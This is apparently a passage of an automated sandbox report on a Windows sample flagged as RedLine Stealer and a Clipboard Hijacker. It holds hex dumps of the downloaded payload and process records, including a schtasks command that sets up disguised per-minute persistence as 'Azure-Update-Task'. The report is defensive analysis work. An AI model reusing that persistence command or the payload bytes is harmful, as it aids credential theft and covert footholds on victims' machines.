                                                                                                                                                                                        2021-09-25 08:17:19 UTC135INData Raw: 65 74 41 43 50 00 00 37 02 47 65 74 4f 45 4d 43 50 00 00 72 01 47 65 74 43 50 49 6e 66 6f 00 0a 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 18 04 52 74 6c 55 6e 77 69 6e 64 00 66 04 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 9a 01 47 65 74 43 6f 6e 73 6f 6c 65 43 50 00 00 ac 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 89 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 41 00 00 24 05 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 8a 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 57 00 00 67 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 04 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 2d 03 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 69 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57
                                                                                                                                                                                        Data Ascii: etACP7GetOEMCPrGetCPInfoIsValidCodePageRtlUnwindfSetFilePointerGetConsoleCPGetConsoleModeOutputDebugStringA$WriteConsoleWOutputDebugStringWgMultiByteToWideCharIsProcessorFeaturePresent-LCMapStringWiGetStringTypeW
                                                                                                                                                                                        2021-09-25 08:17:19 UTC136INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC152INData Raw: a0 ce 9b 6d 30 42 84 5d da f4 55 66 aa 1a a6 f4 9a a2 37 0f 34 64 90 6e 42 5d 1d 4a a0 94 3f 41 06 b5 88 69 1f e1 dc 81 24 ed 0f 03 72 cf 65 df da 54 d8 91 ee 3a fe 1e 3c e5 42 e5 c7 29 eb 70 9e b4 3c f6 fe c7 57 0c 8c 78 3e 55 d6 a3 a0 29 c0 a3 c3 75 87 7f 4e b0 ca 58 d5 bf 40 00 08 59 e8 30 de 95 4a 0e eb e2 a3 97 b5 61 66 88 56 6c db 75 72 f3 5f 83 09 83 a0 1f 5a db c7 61 7f 0e 64 09 00 19 f0 1b e2 be 48 6e d2 b6 ff d5 76 01 f0 a0 2a d9 78 56 7f 72 cb 0a ae 10 1e 59 c3 00 fe 46 78 99 b1 c8 0a 66 67 1b f0 c0 e1 e0 86 10 da 47 be 07 68 0a 8a 67 b3 dc f3 62 32 a7 b7 2c f6 74 c0 25 39 2f 8c 8a fe 19 8f 3f a4 97 e3 80 0e ac c9 e0 1f cf ad e6 9d 00 4c ec 51 34 a4 f5 6e 5a 67 bb 0d e5 0e 8b 5c b7 ac bd 43 6e c2 11 59 16 25 61 56 a4 70 e3 1b cf 9d da 7b 68 f0
                                                                                                                                                                                        Data Ascii: m0B]Uf74dnB]J?Ai$reT:<B)p<Wx>U)uNX@Y0JafVlur_ZadHnv*xVrYFxfgGhgb2,t%9/?LQ4nZg\CnY%aVp{h
                                                                                                                                                                                        2021-09-25 08:17:19 UTC153INData Raw: c8 4b 1c fb 9f cd 46 4a 2e 10 4a 5b a8 bf 87 25 8f b0 3a 79 43 6d 5c e4 aa 6d e3 1e c6 34 42 a5 16 26 32 f2 df 3b 40 f3 c7 39 3a 4a 56 52 81 23 c2 5c 34 45 06 3b 6f 56 06 a4 15 bd 54 73 b8 8b 78 25 94 61 d4 b2 e6 f8 92 aa bc ff 43 59 bb bb b8 f3 45 de 23 3b 8c 87 1e f5 6e 12 6f 18 2e 40 cf 95 80 d9 4a ea 3c 4d b9 6d b8 74 29 54 7b 03 ce 55 82 50 9c 42 25 3d ab 0e 05 07 81 59 d2 17 b2 cf 00 8d 55 12 ac da c3 0a 34 23 29 16 11 8c 0f a7 c3 92 fd 81 39 61 95 8f f0 21 19 b2 ac 57 d7 ad 25 2a 06 6b c1 cc 50 66 4d fc 80 e8 a0 3d 01 a8 53 bf 0e 49 48 1b 4f 03 0a 78 3e 3f 0f 1a f0 26 18 cc a6 44 bb 3f 7e 28 5b 1f a9 98 f8 eb eb 17 66 86 74 c0 10 67 90 0e 50 a3 5f 89 b5 35 06 f6 8d b4 3c 81 88 95 c8 e4 fc 5a 8d 80 ab e0 fe 18 d0 14 d8 cb 9b 02 f8 1f b1 47 ec 62 04
                                                                                                                                                                                        Data Ascii: KFJ.J[%:yCm\m4B&2;@9:JVR#\4E;oVTsx%aCYE#;no.@J<Mmt)T{UPB%=YU4#)9a!W%*kPfM=SIHOx>?&D?~([ftgP_5<ZGb
                                                                                                                                                                                        2021-09-25 08:17:19 UTC169INData Raw: f9 88 db 2b cc a7 b0 cd 1a b2 10 09 c0 5a d3 3c b8 20 4d 9d 82 3c cf 0f d1 ad 8a 74 d2 ee e2 8b ba 3d cd 16 b2 9d 4d f7 75 cc 08 a7 7c de ad d4 01 1a f3 0f e9 fc 4e 7d 6a 9d 3e d4 c5 60 9c 26 6c 69 12 32 a3 80 f9 59 73 60 d5 cb 4e d9 ed 17 98 92 d8 15 49 2e 21 d5 36 81 9f 70 bd 81 97 84 a6 4b d8 ce b7 70 2f 97 4d b2 2c bb 55 9a af a7 d2 25 ea 73 11 ea 55 29 ec 14 42 d7 1c 67 5e 41 c6 cf 75 2d 53 d8 d0 dd ea 8a 8c a2 d6 8c 70 42 d1 e2 65 7a 4b fc 43 32 8f 61 15 0a a6 bd 80 52 2b b1 06 cb 5d 0d b4 80 1d 13 ad 34 5e b0 71 45 10 ad 89 e6 dc 10 6b 3b b6 1f 93 3c 89 32 8e 62 47 84 cc 30 ad 64 6e 0a e7 87 a3 92 29 42 74 2d 70 51 23 f8 f6 2b ce ef 18 ed 56 47 1f a5 fd 2c 75 d2 0c 82 30 bf c3 b2 b2 32 65 88 1c 38 f5 71 0e 6c 7c 41 ca 20 28 3e 06 e8 22 7b a0 e0 ac
                                                                                                                                                                                        Data Ascii: +Z< M<t=Mu|N}j>`&li2Ys`NI.!6pKp/M,U%sU)Bg^Au-SpBezKC2aR+]4^qEk;<2bG0dn)Bt-pQ#+VG,u02e8ql|A (>"{
                                                                                                                                                                                        2021-09-25 08:17:19 UTC170INData Raw: eb 50 f2 d6 43 ec 2b bb e6 f5 04 e4 d6 e0 3a d0 b6 2a 2e df dd 9e ad 14 86 b1 2b 72 83 7d a3 f4 f2 2e cb db 76 35 07 83 f3 03 6e 97 07 65 51 45 ba 4e b2 76 57 dd a0 ac ce 52 87 cd ba 0d de 90 0a 71 85 3b b1 f7 d2 0c d3 be ea 6c 7a a9 fd 84 e8 27 b9 0b 04 00 51 03 07 83 d1 42 ba 3b 49 57 99 98 56 f0 67 c2 c7 f1 cb 9e 61 5b 7b 74 23 70 8c 79 ed c9 37 a5 8b c2 6c a4 6f c0 58 5c fb cc 38 76 83 94 33 42 5a f7 01 af b2 85 60 8a 6f 00 c9 cc 0f eb a5 ff 1e 15 cc 06 d5 a2 f5 09 17 f7 ba 24 14 95 ab 49 3b f0 65 fc f4 ad f8 36 b8 b0 0f 24 c2 64 67 05 48 80 e7 4d d9 0d 28 5b ba bb 4c 9c 9b 18 eb bd 4e 37 bd 67 92 28 41 5c 67 ea 28 82 52 0a f8 ce 6f c3 ae 4d 17 4f e2 40 4a a1 e6 c2 21 be 12 79 78 35 19 dd f2 42 d8 f3 4e aa af 03 62 5c 04 51 04 7e 40 2d 76 c0 4b aa 92
                                                                                                                                                                                        Data Ascii: PC+:*.+r}.v5neQENvWRq;lz'QB;IWVga[{t#py7loX\8v3BZ`o$I;e6$dgHM([LN7g(A\g(RoMO@J!yx5BNb\Q~@-vK
                                                                                                                                                                                        2021-09-25 08:17:19 UTC186INData Raw: 46 0e 45 0b 53 e4 93 ec f2 8f c2 68 a4 e6 b4 24 00 fa fa 75 b4 aa 9e c2 b0 6f 64 f9 05 5c 57 71 81 06 16 57 a0 db 3d a7 fc 46 a6 c8 2b 27 b1 04 90 26 4a 22 db 1c 72 ae 85 6f ad a0 00 fc ec a3 06 c4 86 c8 f9 d0 dc 2d a4 26 d2 42 17 36 aa 0e a8 99 35 17 d7 6d ba 4c 80 8b b2 7e c7 ba 4b f1 b3 d3 82 95 40 84 88 ed ec 45 77 0c 1d 40 0e 34 3a 7c d4 d9 e6 5d 0e 22 27 fa 12 00 76 22 12 92 f8 74 df 12 07 37 0f 8d 0e ca 80 dc ca 37 13 18 02 d7 c4 d8 ec 39 72 82 3b 99 bf e4 5c ac 59 7f 3f 84 e9 81 a9 f6 ef c9 5e d6 16 c4 d2 5e 39 c1 4f 3b ca c6 e7 6b 9e db 6a cf cf f0 47 f9 a7 4d d8 fd 79 15 70 52 dc 10 b6 c3 15 76 47 ed e8 66 33 40 d8 c4 12 37 1f e5 0d 7f 8c 5a 59 02 a1 1f 94 26 3d 25 42 80 6d da a1 2e 7b ce 3e ff 72 48 da 4b 34 27 99 9c 79 60 c0 6d e2 39 23 23 f8
                                                                                                                                                                                        Data Ascii: FESh$uod\WqW=F+'&J"ro-&B65mL~K@Ew@4:|]"'v"t779r;\Y?^^9O;kjGMypRvGf3@7ZY&=%Bm.{>rHK4'y`m9##
                                                                                                                                                                                        2021-09-25 08:17:19 UTC187INData Raw: da c4 91 b0 b7 90 7b 9f c6 71 a9 16 61 31 ec 12 53 01 63 e9 b7 fc 74 99 c9 ca 3b dd a0 38 84 5b c4 f0 44 3b 58 28 5b 8e da 1f a6 31 f3 6e 08 c2 54 84 4f 07 a9 8d 34 96 7d 5e a2 5d 77 3d 70 e9 58 e1 f0 0b fb 3d c7 d4 37 ab 30 76 94 0c 72 a8 e6 a0 77 df c9 d1 6b 70 06 0b c4 63 09 78 4c d9 02 b0 36 aa c9 b4 01 9b d4 31 ea 58 de 81 ba cb 92 20 db 18 3f 86 59 97 bf c6 78 7d cb 79 05 75 ce d1 2f e8 b3 9a 7b 88 d9 2c db d0 5a 6c e5 40 fa 34 17 96 98 1f d7 d9 b9 1f 70 ea cf 26 cc 3c 2c d8 78 4e 00 ad 2a 52 b0 c2 cb e2 49 69 79 50 30 0d 09 42 c7 f4 11 8d 9e a9 41 e9 38 ad 44 89 b6 8b 87 98 29 52 a7 7f 31 a3 59 87 5a 33 80 19 97 aa 8a 1d ea ad d5 9a 61 fe 6a 97 55 1b 13 df 40 41 be 55 d6 8c 51 e6 65 93 35 0d c2 95 44 b7 9c a9 7b 5b cd 60 b5 8d ce 63 cf d5 82 c2 c3
                                                                                                                                                                                        Data Ascii: {qa1Sct;8[D;X([1nTO4}^]w=pX=70vrwkpcxL61X ?Yx}yu/{,Zl@4p&<,xN*RIiyP0BA8D)R1YZ3ajU@AUQe5D{[`c
                                                                                                                                                                                        2021-09-25 08:17:19 UTC203INData Raw: 00 00 00 00 00 a0 e2 77 02 fa 02 00 00 00 00 00 00 00 00 00 00 c8 de 77 02 d8 03 00 00 00 00 00 00 00 00 00 00 30 a3 77 02 a8 25 00 00 00 00 00 00 00 00 00 00 a0 e5 77 02 78 00 00 00 00 00 00 00 00 00 00 00 d8 c8 77 02 14 00 00 00 00 00 00 00 00 00 00 00 38 e6 77 02 34 01 00 00 00 00 00 00 00 00 00 00 18 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00 28 e6 77 02 0a 00 00 00 00 00 00 00 00 00 00 00 07 00 48 00 55 00 52 00 45 00 57 00 4f 00 48 00 1a 00 4c 00 49 00 42 00 45 00 56 00 4f 00 42 00 41 00 47 00 49 00 57 00 4f 00 52 00 4f 00 48 00 55 00 43 00 4f 00 44 00 41 00 56 00 4f 00 52 00 45 00 4a 00 41 00 07 00 4e 00 4f 00 54 00 45 00 46 00 4f 00 59 00 03 00 4d 00 55 00 4d 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00
                                                                                                                                                                                        Data Ascii: ww0w%wxw8w4w(wHUREWOHLIBEVOBAGIWOROHUCODAVOREJANOTEFOYMUM(0`
                                                                                                                                                                                        2021-09-25 08:17:19 UTC204INData Raw: 00 d8 9e a6 26 de 9d bc 26 00 00 00 00 00 00 00 00 00 00 00 00 35 21 4e 17 00 00 00 00 40 26 49 19 3a 1b 4f 17 83 84 81 d7 7b 7f 7f da 90 a3 99 c7 98 8a 8f d4 96 92 9a df 93 99 a1 d5 96 9c 96 df 93 9d 94 d3 90 99 8d d3 a3 a5 91 d0 95 b0 91 d3 87 ad 8e cb 93 a7 8d d7 85 97 95 d3 88 99 84 d8 94 a0 9f d5 94 9a 91 d8 8a 9b 89 d7 97 9b 9b cc 91 9d 8f d7 8e 97 8e ce 89 a0 97 d8 8c 97 8d d4 91 a2 90 d3 92 a2 99 d5 8f a9 8e d3 8d a6 90 c9 92 a4 9c d0 92 ac 9f d4 94 a5 99 e3 8b a1 97 d7 92 92 9a cf 8d 91 91 d0 83 87 81 d6 79 7e 84 d2 ae bb c0 37 ad c7 c4 3b 9e cb c4 40 a4 d1 ca 3d 8b d5 c6 2c 91 da cd 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a5 81 2a 9a 9a 81 26 86 83 7a d3 99 9a 9a d4 d0 d2 c3 d2 cd d4 cd cc cb d2 c9 ce c4 d0 cd d2 c3 ce
                                                                                                                                                                                        Data Ascii: &&5!N@&I:O{y~7;@=,>*&z
                                                                                                                                                                                        2021-09-25 08:17:19 UTC220INData Raw: 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00 00 bd 04 ef fe 00 00 01 00 00 00 11 00 00 00 00 00 00 00 1d 00 00 00 00 00 3f 00 00 00 20 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 00 00 00 01 00 46 00 69 00 6c 00 65 00 00 00 82 00 00 00 01 00 30 00 35 00 35 00 38 00 31 00 36 00 45 00 37 00 00 00 3a 00 0b 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 35 00 2e 00 33 00 2e 00 31 00 30 00 2e 00 31 00 33 00 00 00 00 00 2e 00 0b 00 01 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 32 00 33 00 2e 00 38 00 2e 00 32 00 30 00 2e 00 31 00 37 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00
                                                                                                                                                                                        Data Ascii: VERSION_INFO? File055816E7:ProductVersion15.3.10.13.Version23.8.20.17DVarFileInf
                                                                                                                                                                                        2021-09-25 08:17:19 UTC221INData Raw: 33 c5 33 e2 33 e7 33 15 34 7a 34 86 34 8f 34 d1 34 00 35 26 35 6f 35 9e 35 d6 35 0d 36 31 36 82 36 b1 36 08 37 0c 37 10 37 14 37 28 37 2d 37 3f 37 53 37 8b 37 97 37 c4 37 c9 37 ce 37 db 37 f4 37 0b 38 21 38 27 38 34 38 b5 38 bc 38 d8 38 dd 38 ef 38 15 39 21 39 4e 39 53 39 58 39 7e 39 bb 39 66 3a 87 3a ab 3a b6 3a 79 3b 8a 3b a2 3b b3 3b 58 3c 5d 3c 6f 3c 9b 3c a0 3c c9 3c 21 3d 5a 3d 6a 3d 95 3d b7 3d 05 3e 21 3e 33 3e 4b 3e 81 3e dd 3e 26 3f 2b 3f 69 3f 00 40 00 00 c8 00 00 00 5b 30 8c 30 91 30 96 30 ce 30 49 31 6c 31 7c 31 81 31 c7 31 e6 31 47 32 53 32 b5 32 e5 32 08 33 10 33 26 33 33 33 38 33 53 33 60 33 65 33 73 33 7b 33 93 33 57 34 8d 34 9c 34 a5 34 db 34 ea 34 f5 34 06 35 17 35 1e 35 2d 35 37 35 45 35 4a 35 51 35 5b 35 5f 35 69 35 78 35 7c 35 82 35
                                                                                                                                                                                        Data Ascii: 33334z44445&5o555616667777(7-7?7S777777778!8'848888889!9N9S9X9~99f::::y;;;;X<]<o<<<<!=Z=j===>!>3>K>>>&?+?i?@[00000I1l1|1111G2S22233&33383S3`3e3s3{33W4444444555-575E5J5Q5[5_5i5x5|55
                                                                                                                                                                                        2021-09-25 08:17:19 UTC237INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC238INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC254INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC255INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC271INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        2021-09-25 08:17:19 UTC272INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        Analysis Process: eYvT1lg5Dy.exe PID: 6504 Parent PID: 3512

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:16:40
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Users\user\Desktop\eYvT1lg5Dy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\eYvT1lg5Dy.exe'
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:404648 bytes
                                                                                                                                                                                        MD5 hash:355FBD5060B3BBAF8C5737B4279E9000
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6572 Parent PID: 6504

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:16:40
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: filename.exe PID: 5416 Parent PID: 6504

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:19
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\filename.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\filename.exe'
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:293376 bytes
                                                                                                                                                                                        MD5 hash:D508B954A785BDB77FDEFFCD4C56F8E5
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000003.432844510.0000000002C70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                        • Detection: 49%, ReversingLabs
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: schtasks.exe PID: 5536 Parent PID: 5416

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:22
                                                                                                                                                                                        Start date:25/09/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
                                                                                                                                                                                        Imagebase:0x380000
                                                                                                                                                                                        File size:185856 bytes
                                                                                                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                        Analysis Process: conhost.exe PID: 5524 Parent PID: 5536

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:10:17:22
                                                                                                                                                                                        Start date:25/09/2021
